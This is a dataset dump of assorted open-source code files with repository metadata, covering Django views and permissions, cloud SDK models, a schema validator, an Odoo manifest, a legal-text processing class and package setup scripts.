blob_id stringlengths 40 40 | directory_id stringlengths 40 40 | path stringlengths 3 616 | content_id stringlengths 40 40 | detected_licenses listlengths 0 112 | license_type stringclasses 2 values | repo_name stringlengths 5 115 | snapshot_id stringlengths 40 40 | revision_id stringlengths 40 40 | branch_name stringclasses 777 values | visit_date timestamp[us]date 2015-08-06 10:31:46 2023-09-06 10:44:38 | revision_date timestamp[us]date 1970-01-01 02:38:32 2037-05-03 13:00:00 | committer_date timestamp[us]date 1970-01-01 02:38:32 2023-09-06 01:08:06 | github_id int64 4.92k 681M ⌀ | star_events_count int64 0 209k | fork_events_count int64 0 110k | gha_license_id stringclasses 22 values | gha_event_created_at timestamp[us]date 2012-06-04 01:52:49 2023-09-14 21:59:50 ⌀ | gha_created_at timestamp[us]date 2008-05-22 07:58:19 2023-08-21 12:35:19 ⌀ | gha_language stringclasses 149 values | src_encoding stringclasses 26 values | language stringclasses 1 value | is_vendor bool 2 classes | is_generated bool 2 classes | length_bytes int64 3 10.2M | extension stringclasses 188 values | content stringlengths 3 10.2M | authors listlengths 1 1 | author_id stringlengths 1 132 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
a1f3baae2ae7d957d069289b1f36d2f680d3f886 | ac5e52a3fc52dde58d208746cddabef2e378119e | /exps-gsn-edf/gsn-edf_ut=2.5_rd=0.5_rw=0.06_rn=4_u=0.075-0.35_p=harmonic-2/sched=RUN_trial=12/params.py | 106ee852332fe69aea38aeb0a6597ada33dc539f | [] | no_license | ricardobtxr/experiment-scripts | 1e2abfcd94fb0ef5a56c5d7dffddfe814752eef1 | 7bcebff7ac2f2822423f211f1162cd017a18babb | refs/heads/master | 2023-04-09T02:37:41.466794 | 2021-04-25T03:27:16 | 2021-04-25T03:27:16 | 358,926,457 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 254 | py | {'cpus': 4,
'duration': 30,
'final_util': '2.525095',
'max_util': '2.5',
'periods': 'harmonic-2',
'release_master': False,
'res_distr': '0.5',
'res_nmb': '4',
'res_weight': '0.06',
'scheduler': 'GSN-EDF',
'trial': 12,
'utils': 'uni-medium-3'}
| [
"ricardo.btxr@gmail.com"
] | ricardo.btxr@gmail.com |
8127981a06daf63dd10904afe21974e27bd20512 | 580905861e3bdd1990cde76ba2b057c898e6f088 | /Django_Stuff/class_based_views/basic_app/urls.py | 8096ed097b0ecd3ea89f8ca6fa5ecf60bc74a0e5 | [
"MIT"
] | permissive | muhammad-mamdouh/Django_Projects | 14eddfdc25aa4be43c5d35e30c5efb146e255101 | 1f31e12aefb36b33474256db40a2c551882f445e | refs/heads/master | 2022-12-10T20:02:38.918760 | 2019-12-14T21:24:08 | 2019-12-14T21:24:08 | 198,602,869 | 0 | 1 | null | 2022-11-22T04:13:34 | 2019-07-24T09:28:59 | Python | UTF-8 | Python | false | false | 487 | py | from django.urls import path
from . import views
app_name = 'basic_app'
urlpatterns = [
path('', views.SchoolListView.as_view(), name='schools_list'),
path('<int:pk>/', views.SchoolDetailView.as_view(), name='school_details'),
path('create/', views.SchoolCreateView.as_view(), name='school_create'),
path('update/<int:pk>/', views.SchoolUpdateView.as_view(), name='school_update'),
path('delete/<int:pk>/', views.SchoolDeleteView.as_view(), name='school_delete'),
]
| [
"mahammad.mamdouh@gmail.com"
] | mahammad.mamdouh@gmail.com |
408a957f07a2f0486900b35cab2bb2e923ea175c | b0e22deb519ec621b5f866bb15d15d597e6e75d4 | /tests/models/validators/v3_0_0/jsd_c14128e5729b55e9b1feb638a8295e10.py | 6b6d6f0e8e70d411891cb9993db6641a3b1f7ff3 | [
"MIT"
] | permissive | oianson/ciscoisesdk | 49ed9cd785a8e463cac4c5de3b1f3ff19e362871 | c8fe9d80416048dd0ff2241209c4f78ab78c1a4a | refs/heads/main | 2023-07-31T20:08:29.027482 | 2021-07-09T15:16:04 | 2021-07-09T15:16:04 | 385,743,799 | 0 | 0 | MIT | 2021-07-13T21:52:18 | 2021-07-13T21:52:18 | null | UTF-8 | Python | false | false | 9,567 | py | # -*- coding: utf-8 -*-
"""Identity Services Engine getNetworkAccessGlobalExceptionRuleById data model.
Copyright (c) 2021 Cisco and/or its affiliates.
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
"""
from __future__ import (
absolute_import,
division,
print_function,
unicode_literals,
)
import fastjsonschema
import json
from ciscoisesdk.exceptions import MalformedRequest
from builtins import *
class JSONSchemaValidatorC14128E5729B55E9B1FeB638A8295E10(object):
"""getNetworkAccessGlobalExceptionRuleById request schema definition."""
def __init__(self):
super(JSONSchemaValidatorC14128E5729B55E9B1FeB638A8295E10, self).__init__()
self._validator = fastjsonschema.compile(json.loads(
'''{
"$schema": "http://json-schema.org/draft-04/schema#",
"properties": {
"profile": {
"items": {
"type": "string"
},
"type": "array"
},
"rule": {
"properties": {
"condition": {
"properties": {
"attributeId": {
"type": "string"
},
"attributeName": {
"type": "string"
},
"attributeValue": {
"type": "string"
},
"children": {
"items": {
"properties": {
"conditionType": {
"enum": [
"ConditionReference",
"ConditionAttributes",
"LibraryConditionAttributes",
"ConditionAndBlock",
"LibraryConditionAndBlock",
"ConditionOrBlock",
"LibraryConditionOrBlock",
"TimeAndDateCondition"
],
"type": "string"
},
"isNegate": {
"default": false,
"type": "boolean"
}
},
"type": "object"
},
"minItems": 2,
"type": "array"
},
"conditionType": {
"enum": [
"ConditionReference",
"ConditionAttributes",
"LibraryConditionAttributes",
"ConditionAndBlock",
"LibraryConditionAndBlock",
"ConditionOrBlock",
"LibraryConditionOrBlock",
"TimeAndDateCondition"
],
"type": "string"
},
"datesRange": {
"properties": {
"endDate": {
"maxLength": 10,
"minLength": 10,
"type": "string"
},
"startDate": {
"maxLength": 10,
"minLength": 10,
"type": "string"
}
},
"type": "object"
},
"datesRangeException": {
"properties": {
"endDate": {
"maxLength": 10,
"minLength": 10,
"type": "string"
},
"startDate": {
"maxLength": 10,
"minLength": 10,
"type": "string"
}
},
"type": "object"
},
"description":
{
"default": "",
"type": "string"
},
"dictionaryName": {
"type": "string"
},
"dictionaryValue": {
"type": "string"
},
"hoursRange": {
"properties": {
"endTime": {
"type": "string"
},
"startTime": {
"type": "string"
}
},
"type": "object"
},
"hoursRangeException": {
"properties": {
"endTime": {
"type": "string"
},
"startTime": {
"type": "string"
}
},
"type": "object"
},
"id": {
"type": "string"
},
"isNegate": {
"default": false,
"type": "boolean"
},
"name": {
"type": "string"
},
"operator": {
"enum": [
"equals",
"notEquals",
"contains",
"notContains",
"matches",
"in",
"notIn",
"startsWith",
"notStartsWith",
"endsWith",
"notEndsWith",
"greaterThan",
"lessThan",
"greaterOrEquals",
"lessOrEquals",
"macEquals",
"macNotEquals",
"macNotIn",
"macIn",
"macStartsWith",
"macNotStartsWith",
"macEndsWith",
"macNotEndsWith",
"macContains",
"macNotContains",
"ipGreaterThan",
"ipLessThan",
"ipEquals",
"ipNotEquals",
"dateTimeMatches",
"dateLessThan",
"dateLessThanOrEquals",
"dateGreaterThan",
"dateGreaterThanOrEquals",
"dateEquals",
"dateNotEquals"
],
"type": "string"
},
"weekDays": {
"default": [
"Sunday",
"Monday",
"Tuesday",
"Wednesday",
"Thursday",
"Friday",
"Saturday"
],
"items": {
"enum": [
"Sunday",
"Monday",
"Tuesday",
"Wednesday",
"Thursday",
"Friday",
"Saturday"
],
"type": "string"
},
"minItems": 1,
"type": "array"
},
"weekDaysException": {
"items": {
"enum": [
"Sunday",
"Monday",
"Tuesday",
"Wednesday",
"Thursday",
"Friday",
"Saturday"
],
"type": "string"
},
"type": "array"
}
},
"type": "object"
},
"default": {
"default": false,
"type": "boolean"
},
"description":
{
"default": "Empty string",
"type": "string"
},
"hitCounts": {
"default": 0,
"type": "integer"
},
"id": {
"type": "string"
},
"name": {
"type": "string"
},
"rank": {
"default": 0,
"type": "integer"
},
"state": {
"default": "enabled",
"enum": [
"enabled",
"disabled",
"monitor"
],
"type": "string"
}
},
"required": [
"name"
],
"type": "object"
},
"securityGroup": {
"type": "string"
}
},
"type": "object"
}'''.replace("\n" + ' ' * 16, '')
))
def validate(self, request):
try:
self._validator(request)
except fastjsonschema.exceptions.JsonSchemaException as e:
raise MalformedRequest(
'{} is invalid. Reason: {}'.format(request, e.message)
)
| [
"wastorga@altus.co.cr"
] | wastorga@altus.co.cr |
97539f5418cf3928aff3692de719426093e91949 | aa4901a8e75bb31e27a5088ec6e53494e19ea48e | /main/api/permissions.py | 594a2774c732f6e32c3c5f783d4ad4017cca2407 | [] | no_license | ByAvatarOff/SameTinder | e65cbbcc25a383e10c602de235e6f38bd5917f98 | 3e89c572c2edb78286f136f87cc3ff4846bd2059 | refs/heads/master | 2023-05-27T20:07:22.188835 | 2021-06-09T10:42:32 | 2021-06-09T10:42:32 | 335,273,909 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 288 | py | from rest_framework.permissions import BasePermission, SAFE_METHODS
class IsOwnerProfile(BasePermission):
def has_object_permission(self, request, view, obj):
print(obj, view, obj.user.username)
print(obj.user != request.user)
return obj.user != request.user | [
"tsp7439@gmail.com"
] | tsp7439@gmail.com |
959059b948a2b693180c69490a916f6139a44483 | f95d2646f8428cceed98681f8ed2407d4f044941 | /day40/test_lock.py | daad077e967e8ed2e3bf02e29c495f046ca8dacf | [] | no_license | q2806060/python-note | 014e1458dcfa896f2749c7ebce68b2bbe31a3bf8 | fbe107d668b44b78ae0094dbcc7e8ff8a4f8c983 | refs/heads/master | 2020-08-18T01:12:31.227654 | 2019-10-17T07:40:40 | 2019-10-17T07:40:40 | 215,731,114 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 363 | py | from threading import Lock, Thread
m = 0
n = 0
def f1():
while True:
with lock:
if m != n:
print('m =', m, 'n =', n)
if __name__ == '__main__':
lock = Lock()
t = Thread(target=f1)
t.start()
while True:
with lock:
m += 1
n += 1
t.join()
| [
"C8916BA958F57D5A740E38E94644A3F8@i-search.com.cn"
] | C8916BA958F57D5A740E38E94644A3F8@i-search.com.cn |
99eca18e5780231a3499acac6d61f0aae84efe15 | a5698f82064aade6af0f1da21f504a9ef8c9ac6e | /huaweicloud-sdk-meeting/huaweicloudsdkmeeting/v1/model/user_dto.py | 9ec9c3a799f903b7f6373ebbf88a82d594898d68 | [
"Apache-2.0"
] | permissive | qizhidong/huaweicloud-sdk-python-v3 | 82a2046fbb7d62810984399abb2ca72b3b47fac6 | 6cdcf1da8b098427e58fc3335a387c14df7776d0 | refs/heads/master | 2023-04-06T02:58:15.175373 | 2021-03-30T10:47:29 | 2021-03-30T10:47:29 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 13,929 | py | # coding: utf-8
import pprint
import re
import six
class UserDTO:
"""
Attributes:
openapi_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
sensitive_list = []
openapi_types = {
'id': 'str',
'status_code': 'int',
'account': 'str',
'name': 'str',
'english_name': 'str',
'email': 'str',
'phone': 'str',
'dept_name': 'str',
'number': 'str',
'update_time': 'float',
'is_hard_terminal': 'bool',
'vmr_id': 'str',
'signature': 'str',
'title': 'str',
'description': 'str',
'hide_phone': 'str',
'type': 'str'
}
attribute_map = {
'id': 'id',
'status_code': 'statusCode',
'account': 'account',
'name': 'name',
'english_name': 'englishName',
'email': 'email',
'phone': 'phone',
'dept_name': 'deptName',
'number': 'number',
'update_time': 'updateTime',
'is_hard_terminal': 'isHardTerminal',
'vmr_id': 'vmrId',
'signature': 'signature',
'title': 'title',
'description': 'description',
'hide_phone': 'hidePhone',
'type': 'type'
}
def __init__(self, id=None, status_code=None, account=None, name=None, english_name=None, email=None, phone=None, dept_name=None, number=None, update_time=None, is_hard_terminal=None, vmr_id=None, signature=None, title=None, description=None, hide_phone=None, type=None):
"""UserDTO - a model defined in huaweicloud sdk"""
self._id = None
self._status_code = None
self._account = None
self._name = None
self._english_name = None
self._email = None
self._phone = None
self._dept_name = None
self._number = None
self._update_time = None
self._is_hard_terminal = None
self._vmr_id = None
self._signature = None
self._title = None
self._description = None
self._hide_phone = None
self._type = None
self.discriminator = None
if id is not None:
self.id = id
if status_code is not None:
self.status_code = status_code
if account is not None:
self.account = account
if name is not None:
self.name = name
if english_name is not None:
self.english_name = english_name
if email is not None:
self.email = email
if phone is not None:
self.phone = phone
if dept_name is not None:
self.dept_name = dept_name
if number is not None:
self.number = number
if update_time is not None:
self.update_time = update_time
if is_hard_terminal is not None:
self.is_hard_terminal = is_hard_terminal
if vmr_id is not None:
self.vmr_id = vmr_id
if signature is not None:
self.signature = signature
if title is not None:
self.title = title
if description is not None:
self.description = description
if hide_phone is not None:
self.hide_phone = hide_phone
if type is not None:
self.type = type
@property
def id(self):
"""Gets the id of this UserDTO.
用户ID。
:return: The id of this UserDTO.
:rtype: str
"""
return self._id
@id.setter
def id(self, id):
"""Sets the id of this UserDTO.
用户ID。
:param id: The id of this UserDTO.
:type: str
"""
self._id = id
@property
def status_code(self):
"""Gets the status_code of this UserDTO.
查询用户详情时, 根据不同情况,响应不同。 * 0: 查询成功且用户信息有变化, 响应会把新的信息都返回回去 * 1 :查询成功且用户信息没有变化,响应只会返回用户ID * 2 :用户不存在 * 3 :无权限查询这个用户
:return: The status_code of this UserDTO.
:rtype: int
"""
return self._status_code
@status_code.setter
def status_code(self, status_code):
"""Sets the status_code of this UserDTO.
查询用户详情时, 根据不同情况,响应不同。 * 0: 查询成功且用户信息有变化, 响应会把新的信息都返回回去 * 1 :查询成功且用户信息没有变化,响应只会返回用户ID * 2 :用户不存在 * 3 :无权限查询这个用户
:param status_code: The status_code of this UserDTO.
:type: int
"""
self._status_code = status_code
@property
def account(self):
"""Gets the account of this UserDTO.
用户账号。
:return: The account of this UserDTO.
:rtype: str
"""
return self._account
@account.setter
def account(self, account):
"""Sets the account of this UserDTO.
用户账号。
:param account: The account of this UserDTO.
:type: str
"""
self._account = account
@property
def name(self):
"""Gets the name of this UserDTO.
用户名。
:return: The name of this UserDTO.
:rtype: str
"""
return self._name
@name.setter
def name(self, name):
"""Sets the name of this UserDTO.
用户名。
:param name: The name of this UserDTO.
:type: str
"""
self._name = name
@property
def english_name(self):
"""Gets the english_name of this UserDTO.
英文名。
:return: The english_name of this UserDTO.
:rtype: str
"""
return self._english_name
@english_name.setter
def english_name(self, english_name):
"""Sets the english_name of this UserDTO.
英文名。
:param english_name: The english_name of this UserDTO.
:type: str
"""
self._english_name = english_name
@property
def email(self):
"""Gets the email of this UserDTO.
邮箱。
:return: The email of this UserDTO.
:rtype: str
"""
return self._email
@email.setter
def email(self, email):
"""Sets the email of this UserDTO.
邮箱。
:param email: The email of this UserDTO.
:type: str
"""
self._email = email
@property
def phone(self):
"""Gets the phone of this UserDTO.
用户手机。
:return: The phone of this UserDTO.
:rtype: str
"""
return self._phone
@phone.setter
def phone(self, phone):
"""Sets the phone of this UserDTO.
用户手机。
:param phone: The phone of this UserDTO.
:type: str
"""
self._phone = phone
@property
def dept_name(self):
"""Gets the dept_name of this UserDTO.
用户部门。
:return: The dept_name of this UserDTO.
:rtype: str
"""
return self._dept_name
@dept_name.setter
def dept_name(self, dept_name):
"""Sets the dept_name of this UserDTO.
用户部门。
:param dept_name: The dept_name of this UserDTO.
:type: str
"""
self._dept_name = dept_name
@property
def number(self):
"""Gets the number of this UserDTO.
用户号码。
:return: The number of this UserDTO.
:rtype: str
"""
return self._number
@number.setter
def number(self, number):
"""Sets the number of this UserDTO.
用户号码。
:param number: The number of this UserDTO.
:type: str
"""
self._number = number
@property
def update_time(self):
"""Gets the update_time of this UserDTO.
用户信息最后更新时间。
:return: The update_time of this UserDTO.
:rtype: float
"""
return self._update_time
@update_time.setter
def update_time(self, update_time):
"""Sets the update_time of this UserDTO.
用户信息最后更新时间。
:param update_time: The update_time of this UserDTO.
:type: float
"""
self._update_time = update_time
@property
def is_hard_terminal(self):
"""Gets the is_hard_terminal of this UserDTO.
是否为硬终端。
:return: The is_hard_terminal of this UserDTO.
:rtype: bool
"""
return self._is_hard_terminal
@is_hard_terminal.setter
def is_hard_terminal(self, is_hard_terminal):
"""Sets the is_hard_terminal of this UserDTO.
是否为硬终端。
:param is_hard_terminal: The is_hard_terminal of this UserDTO.
:type: bool
"""
self._is_hard_terminal = is_hard_terminal
@property
def vmr_id(self):
"""Gets the vmr_id of this UserDTO.
用户虚拟会议室ID。
:return: The vmr_id of this UserDTO.
:rtype: str
"""
return self._vmr_id
@vmr_id.setter
def vmr_id(self, vmr_id):
"""Sets the vmr_id of this UserDTO.
用户虚拟会议室ID。
:param vmr_id: The vmr_id of this UserDTO.
:type: str
"""
self._vmr_id = vmr_id
@property
def signature(self):
"""Gets the signature of this UserDTO.
用户签名。
:return: The signature of this UserDTO.
:rtype: str
"""
return self._signature
@signature.setter
def signature(self, signature):
"""Sets the signature of this UserDTO.
用户签名。
:param signature: The signature of this UserDTO.
:type: str
"""
self._signature = signature
@property
def title(self):
"""Gets the title of this UserDTO.
职位。
:return: The title of this UserDTO.
:rtype: str
"""
return self._title
@title.setter
def title(self, title):
"""Sets the title of this UserDTO.
职位。
:param title: The title of this UserDTO.
:type: str
"""
self._title = title
@property
def description(self):
"""Gets the description of this UserDTO.
描述信息。
:return: The description of this UserDTO.
:rtype: str
"""
return self._description
@description.setter
def description(self, description):
"""Sets the description of this UserDTO.
描述信息。
:param description: The description of this UserDTO.
:type: str
"""
self._description = description
@property
def hide_phone(self):
"""Gets the hide_phone of this UserDTO.
是否隐藏手机号(如果为true,其他人查询该用户时,不会返回该用户的手机号。自己查自己是可见的)
:return: The hide_phone of this UserDTO.
:rtype: str
"""
return self._hide_phone
@hide_phone.setter
def hide_phone(self, hide_phone):
"""Sets the hide_phone of this UserDTO.
是否隐藏手机号(如果为true,其他人查询该用户时,不会返回该用户的手机号。自己查自己是可见的)
:param hide_phone: The hide_phone of this UserDTO.
:type: str
"""
self._hide_phone = hide_phone
@property
def type(self):
"""Gets the type of this UserDTO.
类型: * NORMAL_USER=普通用户 * HARD_TERMINAL=硬终端用户 * WHITE_BOARD=第三方白板 * HW_VISION_MEMBER=智慧屏
:return: The type of this UserDTO.
:rtype: str
"""
return self._type
@type.setter
def type(self, type):
"""Sets the type of this UserDTO.
类型: * NORMAL_USER=普通用户 * HARD_TERMINAL=硬终端用户 * WHITE_BOARD=第三方白板 * HW_VISION_MEMBER=智慧屏
:param type: The type of this UserDTO.
:type: str
"""
self._type = type
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.openapi_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
if attr in self.sensitive_list:
result[attr] = "****"
else:
result[attr] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, UserDTO):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
| [
"hwcloudsdk@huawei.com"
] | hwcloudsdk@huawei.com |
a28e70a40e954a2b65089db852c5a4ebf621fa2c | 0b932d446d88013fadb8c4e0dd3ca3cc4a1a5de3 | /localizacion/inte_nro_control_secuencial/__manifest__.py | 3fe660f1f411281f17218061b50905c915108f7f | [] | no_license | grudiver/biumak | cd8e7477bba3389b2144fa6d35cd89d2eaf0210f | 65705737f16da087b6cb01f725236e7bc9c59c86 | refs/heads/master | 2022-04-11T13:17:33.347975 | 2020-03-24T17:55:24 | 2020-03-24T17:55:24 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 638 | py | # coding: utf-8
###########################################################################
##############################################################################
{
"name": "Números de control SENIAT automaticos TYSAMNCA",
"version": "1.0",
"author": "Tysamnca",
"license": "AGPL-3",
"category": "Sales",
#"website": "http://www.tysamnca.com/",
"colaborador":"Nathaly Partidas",
"depends": [
"account",
"l10n_ve_fiscal_requirements",
"base"
],
'demo': [
],
"data": [
'view/invoice_view.xml',
],
'test': [
],
"installable": True,
} | [
"soporte.innova2129@gmail.com"
] | soporte.innova2129@gmail.com |
07a6a238b645d7e22766752b4f28aa6af2f7adf2 | 52243c4a05a296e7c042663b5942faa47eb66aee | /common_nlp/historico_processo.py | 0ae114414b1095471ef1bb0480d7dbc6e4ac3f52 | [
"MIT"
] | permissive | joaoppadua/Pesquisas | fbe0311b59340c041732d6d1f7f4862fa6c53198 | 808d8b0ef9e432e05a4f284ce18778ed8b3acd96 | refs/heads/master | 2023-07-16T02:50:30.846205 | 2021-09-03T13:34:54 | 2021-09-03T13:34:54 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,954 | py | from parserTextoJuridico import parserTextoJuridico
import pandas as pd, json, arrow
class historico_processo(parserTextoJuridico):
"""Classe para obtenção de histórico do processo"""
def __init__(self):
super().__init__()
self.batch_publicacoes = 1000
self.historico = None
self.id_processo = None
self.processos_analisados = []
self.numero_processo = None
def andamentos_id_regex(self, cursor, regex, upper_bound, lower_bound=0):
for n in range(lower_bound, self.batch_publicacoes):
publicacoes = self.download_publicacoes(cursor, n)
for numero, texto in publicacoes:
if numero not in self.processos_analisados and re.search(regex, texto):
self.processos_analisados.append(numero)
lista_numeros_procurar = '"'
for p in self.processos_analisados:
lista_numeros_procurar += p + '",'
lista_numeros_procurar += '"'
cursor.execute(
"SELECT id from diarios.numero_proc where numero in (%s);"
% (lista_numeros_procurar)
)
lista_ids = [i[0] for i in cursor.fetchall()]
return lista_ids
def atualiza_historico(self, andamentos):
for tribunal, data_pub, texto, classe_publicacao in andamentos:
if classe_publicacao == "NULL" or classe_publicacao == "":
classe = self.classifica_texto(texto)
if classe == "Certidão":
self.historico["certidões"].append((data_pub, tribunal, texto))
elif (
classe == "Agravo"
or classe == "Mandado de Segurança"
or classe == "Embargos declaratórios"
or classe == "Recurso"
):
self.historico["recursos"].append((data_pub, tribunal, texto))
elif classe == "Movimento processual":
self.historico["movimentações processuais"].append(
(data_pub, tribunal, texto)
)
elif classe == "Sentença" or classe == "Homologação de acordo":
self.historico["sentença"].append((data_pub, tribunal, texto))
elif classe == "Liminar":
self.historico["liminares"].append((data_pub, tribunal, texto))
else:
self.historico["outras movimentações"].append(
(data_pub, tribunal, texto)
)
self.tempo_duracao()
def atualiza_historico_existente(self, novos_andamentos, historico_p=None):
# Para o caso de armazenar o histórico e posteriormente atualizá-lo com novos andamentos
if historico_p:
self.load_historico(historico_p)
self.atualiza_historico(novos_andamentos)
def criar_historico(self, andamentos):
# FALTA
# perícia
# execução
self.historico = {
# tuples com (data,tribunal, texto)
"audiencias": [],
# tuples com (data,tribunal, texto)
"certidões": [],
# data única da última distribuição
"distribuição": None,
# tuples com (data, tribunal, texto)
"liminares": [],
# tuples com (data, tribunal, texto)
"movimentações processuais": [],
# tuples com (data, tribunal, texto)
"outras movimentações": [],
# tuples com (data, tribunal, texto)
"recursos": [],
# tuple com (data, tribunal, texto)
"sentença": [],
# dicionário com o tempo de duração do processo
"tempo de duração": {
"Audiência a sentença": None,
"Citação a sentença": None,
"Distribuição a audiência": None,
"Distribuição a sentença": None,
},
}
self.atualiza_historico(andamentos)
def download_publicacoes(self, cursor, lower_bound):
cursor.execute(
"SELECT numero, texto from diarios.publicacoes_diarias limit %s, %s"
% (lower_bound, self.batch_publicacoes)
)
dados = cursor.fetchall()
return dados
def historico_as_string(self):
# para armazenar o histórico como um json
return json.dumps(self.historico)
def load_historico(self, historico):
# para processar um histórico do processo
self.historico = json.loads(historico)
def tempo_duracao(self):
# FALTA:
# Saber como encontrar certidão ref a mandado de citação cumprido
# Saber como encontrar data de distribuição
if not self.historico:
return None
data_distribuicao = None
data_audiencia = None
data_sentenca = None
if self.historico["distribuição"]:
data_distribuicao = arrow.get(self.historico["distribuição"], "DD/MM/YYYY")
if len(self.historico["audiencias"]):
data_audiencia = arrow.get(
self.historico["audiencias"][-1][1], "DD/MM/YYYY"
)
if len(self.historico["sentença"]):
data_sentenca = arrow.get(self.historico["sentença"][-1][1], "DD/MM/YYYY")
if data_sentenca:
if data_audiencia:
self.historico["tempo de duração"]["Audiência a sentença"] = (
data_sentenca - data_audiencia
).days
if data_distribuicao:
self.historico["tempo de duração"]["Distribuição a sentença"] = (
data_sentenca - data_distribuicao
).days
if data_distribuicao and data_audiencia:
self.historico["tempo de duração"]["Distribuição a audiência"] = (
data_audiencia - data_distribuicao
).days
def main():
pass
if __name__ == "__main__":
main()
| [
"danilopcarlotti@gmail.com"
] | danilopcarlotti@gmail.com |
d48c7d8e186158688fa8c2d9fb45afdee4e40eee | d28bd8a27dd33e8140f2dc48ae169b8c0fe46147 | /setup.py | 301b47df2fa164da557c51ec1ff11a2069a127f4 | [] | no_license | marians/agssearch | b622de07b154ffdc688d477eb8ada66b516f8a64 | 3cabcaffda87347860072397a8e21773f217fad5 | refs/heads/master | 2016-09-05T11:30:19.978140 | 2014-01-26T12:45:22 | 2014-01-26T12:45:22 | 9,577,467 | 3 | 1 | null | null | null | null | UTF-8 | Python | false | false | 637 | py | # encoding: utf-8
from setuptools import setup
try:
import pypandoc
description = pypandoc.convert('README.md', 'rst')
except (IOError, ImportError):
description = ''
setup(name='agssearch',
version='0.4',
description='Python client for the German Destatis Gemeindeverzeichnis',
long_description=description,
author='Marian Steinbach',
author_email='marian@sendung.de',
url='https://github.com/marians/agssearch',
packages=['agssearch'],
install_requires=[
'lxml',
'mechanize'
],
entry_points={
'console_scripts': ['agssearch = agssearch.agssearch:main']
})
| [
"marian@sendung.de"
] | marian@sendung.de |
51bc9804b7ed340c37114ba3be568e7a407ff429 | 9cd180fc7594eb018c41f0bf0b54548741fd33ba | /sdk/python/pulumi_azure_nextgen/network/v20200401/ddos_protection_plan.py | e1c065824886b7f386b7f649e0715cf4605db0b7 | [
"Apache-2.0",
"BSD-3-Clause"
] | permissive | MisinformedDNA/pulumi-azure-nextgen | c71971359450d03f13a53645171f621e200fe82d | f0022686b655c2b0744a9f47915aadaa183eed3b | refs/heads/master | 2022-12-17T22:27:37.916546 | 2020-09-28T16:03:59 | 2020-09-28T16:03:59 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,788 | py | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union
from ... import _utilities, _tables
from . import outputs
__all__ = ['DdosProtectionPlan']
class DdosProtectionPlan(pulumi.CustomResource):
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
ddos_protection_plan_name: Optional[pulumi.Input[str]] = None,
location: Optional[pulumi.Input[str]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
__props__=None,
__name__=None,
__opts__=None):
"""
A DDoS protection plan in a resource group.
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] ddos_protection_plan_name: The name of the DDoS protection plan.
:param pulumi.Input[str] location: Resource location.
:param pulumi.Input[str] resource_group_name: The name of the resource group.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: Resource tags.
"""
if __name__ is not None:
warnings.warn("explicit use of __name__ is deprecated", DeprecationWarning)
resource_name = __name__
if __opts__ is not None:
warnings.warn("explicit use of __opts__ is deprecated, use 'opts' instead", DeprecationWarning)
opts = __opts__
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = dict()
if ddos_protection_plan_name is None:
raise TypeError("Missing required property 'ddos_protection_plan_name'")
__props__['ddos_protection_plan_name'] = ddos_protection_plan_name
__props__['location'] = location
if resource_group_name is None:
raise TypeError("Missing required property 'resource_group_name'")
__props__['resource_group_name'] = resource_group_name
__props__['tags'] = tags
__props__['etag'] = None
__props__['name'] = None
__props__['provisioning_state'] = None
__props__['resource_guid'] = None
__props__['type'] = None
__props__['virtual_networks'] = None
